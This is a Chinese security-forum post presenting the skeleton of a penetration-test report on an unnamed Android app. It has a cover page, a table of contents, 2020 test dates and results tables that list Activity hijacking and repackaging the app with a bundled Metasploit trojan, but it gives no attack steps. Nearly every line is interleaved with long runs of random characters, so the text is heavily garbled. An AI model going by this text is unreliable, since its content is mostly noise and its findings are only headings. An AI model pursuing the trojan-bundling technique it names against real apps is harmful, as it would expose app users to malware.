找回密码
 立即注册

QQ登录

只需一步,快速开始

欢迎中测联盟老会员回家,专门使用25年老域名强势回归
查看: 2958|回复: 0

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
发表于 2022-6-8 20:32:44 | 显示全部楼层 |阅读模式
* T1 C" ?& Q9 D9 F5 I3 R3 S$ j2 X& a, d+ b

1 g" v- \ a7 y; [) u& @3 b0 B( D4 P0 u& J+ S1 [- V- `0 D
2 {# u+ {2 r( m 7 c8 p6 z; a+ W1 f! a. C

: M: w( n; l! N# i. g3 q - k( |; q2 [) ]
, d; g- h7 G4 f9 I 4 @) O8 }' D2 F& ]

' f3 F. c/ W& S7 M# k4 d5 W5 u p. x2 ?0 K }. l 文档编号:                9 ?+ j8 p# k4 L7 ?1 e( G & L( u, H9 J2 I! t

p/ S2 R; \ B' z0 [* j 3 V+ C: R& r4 ~8 }

6 t- c1 }$ d3 p9 i7 h& F4 A5 @! `2 J   1 t% p2 p3 }. L5 F5 d# B4 {3 m9 K \; s$ Q

( ?+ m9 d$ T: _ ? " |6 k- C$ z! ~+ @2 V m. Y

+ r! s; P( y% w& x; n& u, ~2 Q4 k6 I1 c, f; m/ s; b% d   5 [3 { m, [0 t$ G+ Z ) w; I: W8 j1 S* ^; g/ Q

2 u4 ]1 f; {) b2 R% {7 [% b 3 \, B) f( e$ k& z

/ F% I3 c& E6 E# H# W ( @" F$ [9 W: C8 x& f; \4 `- @   5 B& ]. b8 A7 e 8 \3 K. ~9 G, k. ~' T

5 [ y: |. o$ _+ J* C! M1 h s) ~/ c) D0 e- _* p

5 A" G3 m6 H3 N* D 5 s( S6 n/ d) \- n   / L/ A6 x, K0 o. J; g* s% R0 K! @( {. J/ p

$ {6 y3 |, y: N# w& R' X : W1 z. C5 t! f1 e( @$ g- ?- M

7 h; T0 r' w6 e$ E5 q" B% A' Y! T5 k$ c1 Q   " R% D" t% ~* m2 j2 f8 d9 j: t4 V1 p

1 f% }+ p- `0 r/ K: Z8 o; x , w9 y9 I, d3 M* ?

0 D2 J% D# L7 H# ~ % b y) L8 d5 N 某某某APP渗透测试 / o2 A1 q( j" B9 ^ . Z" _" f8 x1 `. z

+ o2 z" n" o8 T& b0 B( \! ]4 z ! v/ C5 Q- ~8 I# ]$ K

; s& F4 l0 m: | 0 q7 f) _8 z7 e6 _$ Z0 O+ a% S   ; Z2 c. j/ J6 [4 x) Z ! H, e$ t9 T* M4 j6 _8 ?1 [; i" d# D

' T1 t( I) k/ e- {, E4 k / E _5 A$ H" c$ U- q# ~! k

& n+ G# f7 [" _. |3 f . y& E0 T6 w* m# Z   - t, J, y4 O0 B0 }- |& c- H8 G . x+ V7 d; H: Y4 t7 V

9 p/ b _. E4 u2 f: \" i s & Y3 `+ w- Y8 F+ L1 Y9 Q; I& |5 \6 m/ ~

7 A* x+ G& g. J1 f) i$ ^& ]# x. R7 y! N" v" j" C4 q   . ]' }3 l; Z: m; K! ] % q' l; {! X( n0 x6 ~

) _3 A' x0 s4 a9 P% u t( M* ]+ h3 \+ K" D

: j- s; ^. C4 K 7 k: z# I- z9 K( Z" E   & k& h9 f4 X$ } $ @ ]: k3 K+ C, T' o" _2 H7 Q% Q2 W

; v; {+ {7 Y7 a3 L) t 8 ^. I" d/ g; e- q8 b, x2 M

0 ]+ p/ O: j; N& B# {7 }- y( O6 n, P ' L$ \5 {: D0 t' M* i. t. Y U% ]2 T& g 技 术 报 告 ; a2 |/ A8 u8 Y4 Z K, p: I6 i* B, _. q: z

. _$ V" f3 I4 y# O! g8 d6 q3 h } - o1 M! ?" x0 @: j. Q# R7 n

' {7 l, a% B* g, @5 L 5 W8 Q- l1 K- Z. X   + R& ]$ n) l, _# k" R8 b' A 5 x/ F) R. ~5 H* M8 u' q) W

" o: Q* k# Q( z% V( A' v0 y5 k+ q" H* d8 \! n1 G I

* J! U$ d9 Y* |/ E$ L) N* R ' a9 i3 [5 z# n- q6 h   ; C2 [* a- ?* E8 X; v6 a9 j* d8 e0 r7 |6 N- I+ J, f, H1 i% o

. m* d) Y3 U. {: T& _ + r7 c6 y# [. i4 f/ h0 P% s9 u

' P, A' I1 D9 p * v" I' W( M: b   ( x# C' T7 f5 Y( j& B! X& }0 K

- U0 V' t/ ~2 g- o # d! W$ `* r+ j) q: B

- h+ S0 \9 U1 h" d 7 `. l0 w$ j; x0 s3 k/ `   % R" m2 Y' ^8 Q. r 2 O \' v1 M n$ k9 `; J7 w0 x

8 {2 n# m: p5 c3 ]: G& B, O7 J( K8 c5 J K( Y/ N8 b

: J6 z( M- U! Q* S2 r . x0 L U- Q% X, K. o5 k% h$ f   5 {1 K/ q1 l% [5 g- F# X9 Y/ N8 d0 S; R( Y h

- f' ?/ u; p4 Q : i) Q+ ^& G% `( K# ?1 o

& H9 k' l9 i, h- {4 D) K# [; Y # `# O0 Y8 l, u% P& f   6 G- y4 u! h+ I* A ( C4 q, N) P# [, p

2 q @" U( F: ~* H O7 K $ `5 I- x# E- J0 p; @* Y+ u' ~

* f; V8 ?3 {1 F( Q5 {; q8 }; Q 6 K1 s7 O$ b% a2 ?$ Y. j   4 I6 h4 X7 ], ~ & B; I4 I0 ^6 a$ a1 S) {. Q: k4 L1 ?1 Q7 q

+ X5 G) i; s/ z- F1 R" m / \ L. p. d |

1 A, N" j" \9 q2 N: t S. u; C/ z0 q7 g5 C* y8 |9 v& B9 Q- I   ) {: z' ~/ _, F. y2 l I ; @2 c8 @" W* f& P" G

5 A, ?: T* L( E( y% E8 o9 B- T7 T, E; _" Y. s4 S

# q8 |( ^ K- i% A% s. Z% x% S5 g, Q; R7 I, i. h# v   ^, F C% n$ G* @/ |. H! v & ?' L- E# S y# a) K8 h/ Z

* I; h G( B: E! C$ U- R, H; u 6 X; O1 L' q# y

/ ]: E8 b5 D1 W4 G 7 d! P7 x7 q8 j% x   5 m! c: O9 v- X. }! M5 z4 { 7 d9 ~9 Z4 ]# P7 b" k

# M$ u1 e# {; t4 E- y: T/ a- d. `4 e! E

$ N9 X# r# d, ?+ E% ? 6 k7 \ h4 i8 N% M/ M$ i* I w& i   + I1 h, F" Z9 N; l' |3 [ 4 ?/ {) ^# r2 |

( ?/ Z, E/ b0 V3 M. J: R" Z/ X/ ]; k- |% | G1 F

. g$ r$ f' O4 n6 Y8 Z , |# _" Q: v, }+ R/ k7 x   2 {5 q/ f0 D; ~3 F; G9 E( q 9 A* Y% c* V1 s

( K" M5 ]5 _' u( k 0 o; |! }+ m9 U( z0 V4 q

: G$ {2 ^& S/ y2 p) G+ L5 B. r ' g: ^$ Q$ F& l& p, H. @   0 A) _, V8 ?% T6 n3 g 4 ^6 e0 K) c0 s! H9 h( I/ w

( W7 ? R9 r6 n 1 N% \" M& }7 H$ S1 {1 B

" R& A$ b9 S+ I, y 7 n7 y. r7 N0 m$ p, W( E3 k: v   6 i; v% O7 ]! l. S8 ? 0 m! q4 g, W- q/ R1 i

. o O* V; D3 l7 }: _ e: x1 j4 E. E$ m+ l

8 [$ L% L- V9 x! S2 b9 k& M) R1 A. X% u f* W   0 B8 ]# u$ T. L! u, t 5 q7 ~) x% z. D$ N* t

5 w9 G( x; m3 `- | % I6 S" E! K: l" [6 a

" Q! W' J, Z8 ]6 }! w + Q3 Y2 K/ W- [, ?7 ?+ K; w+ z) [   6 j+ X8 p& P% l+ o# d8 l" T$ b R6 v2 E 1 n7 i& J: i5 ]" [- ^

8 ^" r% {' c) v H- T) M `" A2 H , {8 K2 {/ E) q. ~

2 x q3 I" q9 ~ q+ ~2 U + n0 x- Y3 Y- T7 U   ' a8 B/ }% c8 H- v 0 C% O; @ v2 k5 m! y* o: L

4 f8 V. m# h4 M ( B9 u4 d6 x u" ~' k

# v3 }- {, I, i! q( q- r& ]$ E$ E/ @4 ?5 A1 x   : S' y8 v7 E9 N2 l/ K4 J, O2 c: ?* v. [0 F$ k! A& p

- B+ m9 ]* ^" T0 q 1 K# e8 L4 r# a- q p9 l

9 t0 u+ l% V( S& @- a1 V) q ; Y; u1 `8 C9 ~- ?5 f7 w+ d 二〇二〇年 : Y( R. r( }4 k, C5 {+ u 8 a1 z' d, j1 P+ K, ^2 p; T# q

) X& z% }7 c" _# E0 l C+ e) [ 3 ]$ d# B; U. w; U! l
4 h! _9 U- n& C2 J8 B' n! A# L q' b & B: Y8 f' j* P. I3 Y# L
+ q8 a8 Y5 | Y' g* J; ~ 1 L5 ], D7 }# ^) @) [
0 L+ e ^$ p# n* T! e0 f - Q" a3 y, W1 m) D
# Q( e! L% L& O+ f7 ]1 V: b( e) h6 w* t' y) I& G
! n3 O5 i' K9 C" m, L p' q$ L7 p . u! n1 q8 o; y I( o) r% t3 ]
" I% k$ R$ t) ~1 H- |3 p* S& H
' @1 b9 E% Q) p; n( h6 ^ * _; t% E5 b" ^, f- z: ?, V0 o ^
- c& D0 I! w+ |6 K. }% m- `1 z- { : s9 n2 `/ F& j& Z

6 _1 q; {: ?2 N7 Y1 { 2 y3 h; b- r8 i. p 目 录 8 N. N1 e7 [5 m& x$ E7 Q ! e& d: W2 i' z1 _ ?

& K, c7 n# E' d: X. p' o$ _ - i) ^6 ?# w& U m/ e- C 2 i1 g( }, P% S9 y/ t) v 8 Y: }+ K* ]9 @8 J

" O9 r5 q; F" t/ J , ~: c s, K( t2 B. p   0 ? u1 D# a4 G) k 5 _5 L; J4 R/ i4 y

- P+ M0 V2 R* K3 v* M# ?' R: k2 X5 o- r/ j( A3 x9 Z

8 B" T4 t ?0 G1 d$ W) W 2 l6 {' c p) C& b: L6 d! R 1 概述... 3 9 V* x! u2 f) @ N. z. u( y- l: t: E " P" P# C; d" ^0 T: d( P6 X8 D( g

* m# O3 R' F J0 F6 \& c# E N$ l+ |& P

* C/ b& \: w- _/ `, ^! W' ~' r2 N0 D/ C* Q$ P8 ~8 h 1.2测试时间... 3 ( \* H$ {) Y" {( t' f! ?! W" n' q( N# x% y4 G+ c" y7 Q

7 J D" O( L4 t 1 A7 q y; X& V3 B

# S# e4 x6 v5 Z7 n ! ?+ [" z- B1 ] 1.3测试对象... 3 - I0 F3 p# r0 y & S4 X% Z6 l; H0 b4 @& U o

: k! e5 n4 A, ~* B& P: a 6 f0 K t$ |) S" N4 t9 e

! O( [4 @3 K; O0 v% S& F r 0 g1 i6 U Q' [/ d+ ? 1.4测试结果... 3 8 B+ u! ^0 p& p% C9 d1 ^% G1 X* J) Q5 M" z m+ }! K- r1 ~

8 J3 x6 I) w4 E1 y* s9 b: D 3 X+ v. n! G5 J/ u

, F4 F' z' X" \1 _" _ & l2 H3 {6 l* A% j& G* u 2 检测结果... 4 7 e7 W& U F6 B$ }! p: c7 \ " C' g7 {% t: _- {2 {5 w9 i

0 z8 ?: R& O+ k6 ^) q- e. _ \ / _8 s' \# Q6 C

3 ~$ Y8 I5 I2 |2 ^$ ^1 \0 K2 g, O9 F 2.1 某某某... 4 1 C, E4 d: x9 ?" ^2 j. I3 I - R5 v0 c: v* o9 i

* c2 f" }1 Q( q- M& p' ?0 a9 L5 k , U! K4 m( r K: z7 U/ A4 L

. C4 x" y7 d7 e# i" D& x 6 x( C* R( g# N 2.1.1检测目标... 4 4 m& I3 S1 t" N+ r7 z 5 [* k |# K2 ?# k6 U1 d1 L8 Y

6 N' t- n. y; O5 p i3 S# Q : j9 F# m' [8 c; o9 {6 T+ m

# e+ Y5 @' p/ j8 U) |9 y 0 k1 s( f7 o& K) S8 q/ A 2.1.2检测结果... 4 % p; ]* ?, a) u M' Y! | # h* ?; t8 _8 d* m' [

5 c: u. s" z1 x* Q" l5 t2 q ' @9 s2 }2 L5 Z4 i' P2 ]

5 o9 d7 v9 c. Z- J) d + R2 `8 R2 |% ]) k 2.1.2.1. 4 ' O! W! ]- @% q% R: @: K ! D- ?5 O" E' h

1 H% G! Q6 ]) p, M) M& A, G/ | 1 a* I( a# n. K

) j- r, }& w& z3 t( a) q : \% q, S6 W2 r P, b8 I& |! | 2.1.2.2. 6 ! e) N$ `* S. ^9 r( R1 m! | ! i8 F* I) K- M5 @) D. u4 A

- K: b3 F* g3 n) X4 T* t ( Z& S2 j2 x; e6 c' j

. d0 a/ X/ e% i; j) H7 N$ P ) g2 Q3 Q% S r + K2 |: d5 l. N/ k 7 @2 o& A b v4 d

5 i; [4 V5 @0 d1 a" L" A' H3 V! A& v; N# m3 m+ d3 ]
: j6 L( r: K7 q7 o8 T+ i" y , T7 a" a; Z* n: c$ X3 c0 s
$ S0 {- l2 B; |9 r& Z0 t7 m* D) ~2 y( B* \1 u
3 A: Q2 T, T. W$ q7 i; K# c 1 [( ]- }9 p' G) }+ f# A7 b
7 D+ G( m. j" I9 _( }, {6 b 6 l% F2 }4 b6 S$ Q2 o( \

9 u, m& b. r' q4 D+ f( Q0 d, f/ Q0 S( K9 Z 1 概述 2 a/ i+ a5 Y' e: s, j9 G+ G+ H; B3 ^ w+ o& s; b0 B- A

9 H. l# j1 {( W2 u9 W# n' Y2 Q8 d* o) M* k6 o! t( y

& A2 P& h; k8 S0 [ 3 p/ M3 D9 q9 P$ N 1.2测试时间 , m! a+ ?" e: m- d4 _+ G9 j$ B * R8 I- A* F9 \! W

. @8 Y9 \+ u; e& s ! O0 b+ n" V: f" u1 H- `7 K( O F 9 e1 Q3 Z0 Z0 P @% p3 U7 E- g7 [/ P# U; z0 D$ g5 C4 l7 ?7 |5 d- f& ? _& i) `! Q+ K; O0 s. ^* }# _6 g g+ o3 q7 [1 b7 F u# K$ W9 g5 r0 N4 N# Q: f+ U; i" N" G1 \7 y+ E$ O3 B( U4 R1 u7 a9 G' f4 e9 R/ F3 p" S" d! T: h- L8 a" O& }; h% B1 Z7 K5 H0 j B2 [- |5 B7 G( s& \0 w) F: `, x/ ^+ |' V0 ~, z7 H" }0 x) ]# K9 ]3 {0 f" v3 ` ^: Q6 h& _& K6 h' T& \# h9 D" O& t# ^# j( z" k7 f' b# Q2 u: ^- B2 C& A& _/ R" k0 p) c- s* [" G R2 J1 H, i/ Z/ p* |0 ^8 |4 h( x9 U$ l4 U" T8 B: H3 B! C1 @5 u; P/ U+ i7 { J1 ~7 m! I8 g. L9 F2 o* V2 M$ i. j% y/ p; E7 A6 ^( C5 y& { L8 I5 O W' e. v/ x4 `1 y4 f6 T: S5 q& K; V" Z3 {& Z% U6 K) F# Y# K( A# W- `6 j) b/ b6 Y* r& Z1 k) p2 h0 p; [
# B- C% P9 ]) b M% v " j+ ~. ?5 E+ o* A

8 f$ W% r) ]4 \- H6 Q6 M2 [9 G6 k9 ~ 渗透测试时间 : ?4 w% p0 y6 D2 J * j$ I: K3 u! e; L9 O' o

. i) i' D* p, R3 ~# {# A8 J w k- z
% \2 B" L& l$ d. i 2 `7 s3 t) `* M- i/ k/ V" [! Q

$ t) H& T7 L6 h! f; ?* u9 R# f: v # E! E2 w4 _) e9 l8 H 起始时间 - `3 s9 \6 A. S- L& y9 ~/ x4 g / T5 D2 ]# _1 l- i: j

h3 e' q& Q& Z+ l6 Q; |1 T' z 4 D" r3 g4 j8 H6 \$ d1 c' P1 a
, ?9 C* j4 J k) D) x+ H : m) u m" h6 u w) j* `

* x% @/ n8 k ? ( J6 c3 T( n3 F: h: r/ U- b$ _ 202046 1 ]9 l7 r0 d7 ~3 F* T! H( _6 t, o' I, C8 ]3 b, u

2 ^9 {) D) E: R" a/ ~& x 9 V% I5 {' T @& e
$ K- y3 U6 F4 D5 n4 n ! p! q, G' n6 x. J( w

P+ A% Z P h% T: \+ k }# s 4 ?- x5 M1 Q! s3 ~" h! q 结束时间 U! }: s3 W; m$ W6 l4 y 5 U# o8 _1 x5 h8 E0 q

5 M% @, X- G9 t ( X8 }7 i1 u9 @( U, w+ I& O! u5 V
" p1 B8 ~: e, x) j2 @8 a7 _, A8 c: n: u; o2 h. C

$ d Y$ {* A- o8 V, s0 W9 w, U5 Y) K0 [8 K% W8 Q4 o& x, N 202049 & v( d1 y9 E% i1 L* S, v( O4 p3 l/ I0 f5 O* }. ^- y' O( B

/ c4 \' ?& x2 C; {1 w" Q0 u T) Z( E8 ^$ l. r z
) E8 F, P5 v& {+ Y4 `0 K A' K- L& \/ C

2 K* I! ^5 ~/ g3 S S; W* U9 r3 B |1 W 1.3测试对象 % k+ j: D% m/ Y/ j% c9 X* I& V+ s* f' O* R% C

( b/ y( V/ a: d/ b0 E6 M ) s0 W! j L+ P$ R ~

, P4 a: l5 C( h# ~, r: V: T1 e# v8 F( b% T9 D 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 8 H' B7 e4 l4 m$ o, ?3 B3 s: P , b" A! ^7 O2 z8 ~9 z3 c2 X

" g5 c' {6 Q) w: D * C; c& V' I! s) a* Q4 s

' S% @! g/ d1 h e0 ]# W + \6 \9 @: v# ?- N( B2 R* @, x 1-1 检测对象 . J( D v0 U/ }" W: V [$ z & G: `/ h5 y- q: V

9 \' L" k, d9 r& t5 ^" d$ F 8 d7 }' }% |; n, B0 f: h5 f- W ( W4 x5 e1 N- W' B. ]! y, V! ?# x/ _- \! J5 i! K8 i' G0 q9 g7 s1 N8 q/ S4 p' e/ a0 g1 \' X9 L5 d9 C3 b* r( U. g# G( N' C7 m/ y# z6 q& N7 Z2 w; \/ b: z3 H# V8 z5 |9 P. V9 B m" ?' a6 P! z! I8 j% ` x6 V+ e7 G% L$ ?+ Y z1 v) z6 a5 g: L' [' U# f9 f4 `# z/ Q# |( B1 ?9 `" E) ^6 V3 r: A' S; T4 _5 ~. |- N1 u8 S* a0 ]! b# e. F6 i0 `4 ]% |3 O; ^- i' {1 V/ z# y Q# Q( I( n) U- u7 ~$ }* C$ f) E9 G+ o- p0 o, | e" C* b. N0 C3 l! M- |- \0 }' A" X9 E) \+ h) b. D7 u/ [1 c' a2 I3 L# i5 x( O' c& F% ]' k; z& V2 Q- x- \' v* N) z- O% K! z2 }# a# F$ c& F1 ~$ W* Q8 k+ Q% r# T8 w D5 i- s, x% E$ P, b+ M, P! h7 h$ j# C: h$ Z3 `; o4 u u) m' M' T' A, w1 i* M' @; Y3 y& p6 x$ Y: }5 g6 m& k) |5 D9 U3 D' P$ k/ i, j% y
( Q$ B1 q# K ^8 @! N; } " q# z6 @2 L& I

" y6 _' ]8 m& k% A" y8 ] % a% x2 O2 I/ _- B( n" x 序号 ( @2 R1 I' i6 U4 W+ {. L 7 ~$ w) z+ T% L6 W$ Z4 G

* p; J, s2 Y: C5 Z4 V , Q/ k! [: L- u: R% I+ j6 ]
6 ~1 j/ s. M9 ~- ]/ Z1 z j0 _' a1 Z( w5 J' ]

N$ o0 H/ k* J2 ^6 X & F( {0 s% I6 D# l0 K 测试对象 3 n+ ?! k2 r. g! Y( x ! @9 c0 p9 }( A4 x, I

" c7 c6 X" B5 m% R 6 {% c4 I# ^) e" }$ L
/ @9 P& A( a& \ ' {. k b6 U- v9 ]# h/ \

% Z) g6 ]* a; T$ | / j2 z0 M( p4 z% c" w 测试地址 2 n5 o9 s/ v/ M7 i* ?; j % C* }% B- Y3 \% @

4 A9 v9 u! J& A, U p7 d: {1 |6 J9 e" E0 Z) ?4 N+ l
0 M) |+ h4 Z l# T* b / C8 s/ l9 X# f' q$ }/ [8 f4 M

4 g4 H* d# M4 z4 Y8 o . ?3 D' A& T! w G5 t 安全漏洞 / I' T1 q( O2 |% P+ U - d) T- M1 w( D6 x0 } Q

4 ~/ @$ f1 B/ w. `9 J+ {' s # l" q+ Z( U! U+ \9 v- j) _4 v& P
1 y+ {6 V/ P- H$ G K5 |, h! P1 { ! e0 {/ {8 C1 L2 q4 d- f0 A* N

* z9 M! X+ F' [9 s $ A9 S- b' b% ^4 V* u0 L 1 $ p) u; a, j: G5 Z* L % `7 N5 C3 Z! J3 P) w

& E" i5 s9 \, [# g( P" k3 g* w) k8 S- i1 p
; u* }) W* G5 Z" R, e+ g - w! A. v6 a8 w! W

3 T! U# I( U2 ?+ u. Z5 H+ g ( a& s; R0 A) [, o t/ l' K 某某某安卓APP 4 o' I; ~6 j+ L9 W' B. T2 p, T/ x7 t: P; n! ?2 _- Y

" U) ]' ~1 b" v+ ` ( d8 z* p" O0 f' [
+ h5 g2 t9 V& Q. H6 t# u4 a ; S9 O% @ m+ c8 V* Y! Y- ~

$ I$ o5 O) r. K5 S" B7 W: \6 z2 k5 Z1 {: X) n, x   9 l% ~4 n3 D" r4 x % r* C0 l# [0 i+ d9 [' e' L

5 d$ W' u9 b4 l$ ~ d ) i3 e' ?* \8 z6 }: ^+ l
) J3 L- [# e9 _# [ C' _2 r, S% y/ D* r* g+ ]6 Y. L5 W

0 h! n4 H" P! h7 X7 j8 ?) x& a3 ^0 E) z 2 4 U( O: |( v; e ) W6 {% U d; I

4 [# R1 w' @- c / r: T6 |8 M2 z
, l' S. l3 ^( W/ x# m6 B! W$ ~8 w8 r; i; T! @2 g9 \4 i- x

1 {3 P: B- ~8 t( q7 S 0 k; j1 T* Q4 v/ x1 I# [. r. a$ | 1.4测试结果 G+ o% p4 n& S/ B* W% ] $ S5 j, C% Q' }7 c7 l

6 p; {( T, k" j% h) j$ [/ w% L+ w# b3 U0 Z" }: W. o9 n/ ?6 Y

( m$ v: ~" u' A% N7 F* d* t2 B, a 7 w. I! Y, S- b) b: j$ F7 Y 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: , ?3 |+ F5 i: v2 i2 k2 { , k2 g4 N, E. T0 u8 d0 K6 q* X7 ~

- `1 v0 w# P" e. l$ B 7 r# |9 k4 Q3 Y2 @& N- A+ q

' t3 \/ u- {$ _ l8 C * L6 C) N9 z8 F# ~& O8 K   * I, K/ x! {8 |9 \& ^& [/ X ; `0 o! u- v+ }$ ?4 l% z

+ { n# U( I. k) {1 }8 V 0 G8 b5 Y: v3 B( j8 V, X
- u1 Z* U3 g7 c # z w$ e6 q) u) W1 o ; d* e- J5 y# ~+ a5 h# \$ f0 \6 A0 ~3 K: t8 l/ p7 k! j, M$ p( a2 u, D1 ? N2 v2 P3 U9 w: W* l* w- d$ ?- J D: \ t1 ], l+ E* [- r: x( q% f6 \/ i! y7 D) v) ~ o$ _1 s9 E' z' n. n/ n9 s7 i1 Q5 O" T1 v9 B! ] H; f# r: \. H) J5 t( c! O+ [; q: \) e1 H+ x% E9 v: t; _5 n) h, d& d& a$ [- o5 v5 V% c2 j+ C0 o" _/ H1 t6 @4 d, D- g5 y S9 @9 _8 y$ T1 N' e9 C- M' D( c" V( I0 _1 G0 t/ a7 q: S& i9 }$ P w) h) p o% p: r, R+ V! b% J+ T) m1 t- H/ A v3 |$ k! H! g/ k; K7 g3 F/ A W1 Q9 P+ n+ I8 N/ ~* r/ D, H3 d8 V$ v) V7 l! D/ m$ s9 J/ ?& [1 E% h& z5 ]' T4 Z5 W( _( Q* S, i5 f% g. J1 S" [" m. P# }# k/ m4 `) S w; l/ G1 w% S" C- x1 k4 w9 b$ {3 Z) o. m$ I$ \( |6 D6 z) j+ J+ U7 Q! T. V+ y9 b: B0 h# o. q( Y$ c* x! r* ~% J+ R$ }/ ]9 W( v$ E2 b& F' K n/ T! V% B) e* `7 ?- m- l7 x/ ]0 ]$ D4 z4 ?$ r. a5 [7 w6 J5 ^3 k. ?2 r; p; m& o/ h7 d6 J v) \. b1 Q% g' f* w; V. B4 A3 ~8 H) {2 K5 m3 {" }5 g( t# Z, ] ], Z2 s( _+ c, ~6 x! v4 R: Y4 a+ S0 O) u" c+ ]# X% c' q( F+ o1 `; p$ o( R% ^5 C% {$ i: q, c/ n) N1 ~- e6 o3 g( |0 R# f4 N. x8 g- B( W8 @ I* B, V8 s3 o' ?" B6 W. k0 m g/ _: H8 p0 R' s& w+ e2 W6 M- X7 a. N0 L1 P/ T$ l8 D& V* |( s" Y6 } O2 K2 [. ], E J$ o- k3 _: f; q7 X& H _& a
J9 B5 d- ^. E) Q ; ^) \& J$ s) _" k4 h- V5 [

5 N( B! t! _$ x4 U9 r- a ) K* i7 Y7 D& X5 @4 J7 ?) t; K+ Q 序号 1 C ?& o* U K; m ( ]6 Q6 P7 Z4 B0 J

3 _2 X& j' [+ O) m : n/ i2 K' x6 U6 `0 R
4 W" U, ]4 } P6 d6 D% b* W , l- ~' r1 P$ ^5 \

6 r" M/ b O* V0 t " l. c" P7 Z0 S: i 系统名称 4 ?7 v7 y2 }# O 6 l* M5 B7 G% `' u& E

1 ]6 `! Y Z/ F" R8 E; n+ D8 L/ C+ o$ p0 l" ]( L
3 `( J/ K, o( X% l6 G3 e/ | & X$ X: M: a+ ]6 ^$ Y

) b) p- R r1 D 3 w5 w8 Z/ d7 e 漏洞名称 4 S( z0 ~3 L4 K6 q- E' a 6 _+ P! ^" Z) r% t. Y! P |$ \

" y8 v) P, w9 ]( D ( i$ F% r8 o6 J
3 H. `6 {& B; w2 }1 c9 A% d$ u+ X0 |2 _9 ^

y9 x* n$ w4 N9 g. t( X3 |8 g * }& S, n- P E/ W 漏洞危害 2 W1 f" z& n5 d3 P + }0 `7 [$ r& [, M9 P; P8 S, X

$ g0 j: D2 `1 u 9 R6 _6 e- M: s8 [% i9 S7 {
3 L( N, t' c* l3 x6 _0 T. ?0 H / \; | t0 e7 t# R

- G! @- [* a1 [. j1 [ " D1 {! J2 E, r i- T 修复结果 9 _( E9 O3 O! e7 O/ z. i' M # A. s4 B& c. j

$ ^: [; n- V# |3 C ! ]! U) z# L8 B) Z
1 ?; d$ j3 N3 C0 U! f3 X" D' L/ S9 \

' H" U) i" X% ]% V& Z+ d. S3 T8 d- B1 Y: m- O 1 ; H3 k& u6 } s h1 C & t. t: M) Z0 y2 }9 A( \' L

1 d& p% b9 ~# }4 A& G& h ) g' r* ~( E9 i" |; I3 d' o, G
% {8 ?6 r$ v3 G" l' ^ - g" X% [8 S G$ J3 C W. r

% t$ w1 d( S$ ^9 x3 A9 J3 x M: k, U$ J% l/ p 某某某某某某APP ' J0 n) A5 g; n5 P0 A . z0 n: { y6 w- q# d( ^, u8 ]

. k2 i! p- U, g2 f% q+ I" |8 [$ g, c- E, X( D1 C, D3 t
) R$ S2 x% c- y6 e$ y6 u# e c7 O: r; O. R T/ o

( d( S1 q! W1 @# q * \7 B6 Z% k1 t! | Activity 劫持 4 l/ F* u, _' D( p5 u: ? 4 G" a. B& n% w& M# |1 W+ B9 l

2 j. I6 I5 T% s! k. \9 Z; ~4 K 3 o6 C. \- |5 a5 e) H8 _5 ?

$ X2 Z2 }, D6 ~' f' Z$ J# v ) ~$ K. R: N+ x G' g   " |3 v/ w q/ ]- H " ~2 d9 t: r/ U( |& y) ^" J

& Z) o% F5 {* A* y. {* a/ X 0 \; h6 j- }* ?& Y: c7 z: r' N0 n
- ~- ~. o( `7 M- T0 ^3 L' w1 n$ u, T3 ^8 e* L6 v0 e! o

. S+ Z: R" x! q4 K2 _$ z& { " N* e( s' U" [4 l, u; Y; [ 9 V1 O9 o9 C0 |9 G [/ Z( x& H 2 V c% p3 u% i# c0 E0 n y

! z5 p. x( B3 J2 b- Q+ j# [% C9 ]: S3 f& L% V; }6 W
# ~3 N# _* w8 I, ^7 P& Z; t4 y # }" i+ U. o! i3 c

% |1 O9 d L j E: L/ p- u5 l! H4 G) ?+ J% U   , \2 j: a: |( \ H( G6 s + j# r; ~$ U" h* Q4 U* F

" _- p/ A0 @2 j7 l , W4 C$ G8 [( I* D. y
& J# \$ U2 @& D4 {) |/ r4 n" i9 y7 F1 w4 j k

) h: J1 Q' ~% A; Q+ @, s3 F; G9 ? ( D$ r1 f) W9 K$ e. L 2 2 N- w/ ~6 m+ A* V4 S 4 n! s9 A/ p \' P

% Q$ }3 j; r- D0 X ) `, M+ M7 c* M& X
. j9 U2 q& ?: K' P+ l N6 w& S+ c0 P5 o( I6 O* p

$ ^3 U2 a: `7 B 0 ~: N! T# P6 W7 a% S 某某某某某某APP 8 r+ E; A8 ]6 ? 0 a: s: z: t8 y

" Z k1 n1 i8 A' q" m 3 I, w2 t' V; [$ @' Q0 P% m; z
8 L2 H" Q7 x }1 \ ) L$ k3 n1 c3 ]9 G" e

4 I% l& x) [, s5 V% R 0 V7 f' n1 K7 J" i) G$ } 反编译二次打包捆绑木马、篡改APP代码 O. Y/ v, `# n) D8 x - U. j. s1 B$ U$ f

/ F4 C+ _, q& d6 g' Q+ P8 V9 H6 e; Q( i5 o
6 d- L) k! d! Q- e8 d& g0 h; ~" f$ _2 ]+ i( E# V0 ]) P

4 Z6 N3 Q" `) ?- V+ ~- R8 t1 K ; U" V# n6 P9 C' I7 m7 w; q o6 l0 l# Y/ ^ }: ?! ^1 B5 y' | : @5 M, \7 X0 e9 J# F

" F7 L, {) l( Z3 M! {+ O ) S, Q0 l( D& S _8 l: L7 B
& l' \* {) Q1 S% t2 ^* q H, N ' ~1 R% z/ Z2 H6 k/ b' n( c8 z& ~6 a

1 Z8 ]: @" L- E# }$ a0 q/ Q# N; k5 h, }9 _   + ]' i: l8 Q* R9 K' H0 d $ ^$ Y+ P5 Q t M! g# X0 n6 A

5 m# C5 M; M+ o5 @ 1 u S0 M' M3 H6 U
. N. Z. w$ Z/ {0 }$ x8 A+ C ! W' U. Y, M8 E @) U! ]
$ q) @; a2 ?! l/ l ( ]" c4 c2 u, p8 }, o5 @

Z/ r& Z& b. V/ u \1 A2 o9 M) f 8 A5 d+ ?/ E, [& A   3 v8 j {( F4 x4 G5 X$ J# l : x/ D6 a2 G+ h4 v( v5 G, ~

7 X+ L8 A% e0 s2 b. [ ' w0 V; p5 ^5 S; T% M

8 X, L6 O# z& ~8 }1 l7 |+ _ - V9 [5 a0 L3 D 1-2 测试结果 : k) r' k, P9 U! b/ @( E% r. i * l6 F& g, {2 N$ v/ D

/ s* S1 j* x# t& N7 ^8 s! o ]7 l9 w1 U. v* b1 F3 K% \

